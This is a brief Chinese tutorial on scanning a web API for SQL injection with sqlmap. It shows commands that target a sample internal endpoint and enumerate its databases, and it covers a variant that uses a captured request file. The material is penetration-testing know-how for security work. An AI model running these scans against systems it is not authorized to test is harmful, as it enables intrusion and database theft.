sqlmap扫描发现注入点实例

这里只简单介绍一下扫描发现注入点

1、安装python2.7并设置环境变量

2、SQLMAP程序包&下载地址：sqlmap.org

3、直接解压文件，文件内容如下：

4、使用方法

这里以“oaapi-用户查询接口”为例：

http://172.16.5.102:8011/User/GetNeedSyncUsersByMaxTimestamp?key=U2VEVkM0RUtxY3dRQlJIMjdHek9oYXFTZ1ZaRXRwbGdKSGVkNjNMVFRCRjdZRVdkTTlhODJ3JTJmOXNoJTJiNE1VZVF5VGUlMmJRbG9GOGZqbFYzQVljUGlBMUElM2QlM2Q=&maxKey=0x00000007F3E9CA62&svcName=hz_EwsDataUpload&top=3000

打开cmd——进入SQLMAP的文件夹

方法1：直接输入url：

python sqlmap.py -u “url地址” -p （参数名）（-p是指定参数用，也可以不指定）--dbs(列出数据库)

示例：

python sqlmap.py -u "http://172.16.5.102:8011/User/GetNeedSyncUsersByMaxTimestamp?key=U2VEVkM0RUtxY3dRQlJIMjdHek9oYXFTZ1ZaRXRwbGdKSGVkNjNMVFRCRjdZRVdkTTlhODJ3JTJmOXNoJTJiNE1VZVF5VGUlMmJRbG9GOGZqbFYzQVljUGlBMUElM2QlM2Q=&maxKey=0x00000007F3E9CA62&svcName=hz_EwsDataUpload&top=3000" -p maxKey --dbs

-u 指定url

-p 扫描指定参数

--dbs 列出数据库

如果有需要选择Y/N,一般回车即可：

当出现这种情况要选y，这是在问是否还对其他参数进行测试：

发现注入点及返回的数据库列表

若没有注入点则提示：

方法2：

（1）在SQLMAP文件夹建立任意名txt文件

（2）抓包接口把结果粘贴到txt文件文件中

cmd执行：

python sqlmap.py -r (文件名) -p （参数名）（-p是指定参数用，也可以不指定）--dbs(列出数据库)

注:重新扫描需要删除日志：默认路径:C:\Users\Administrator\.sqlmap\output

7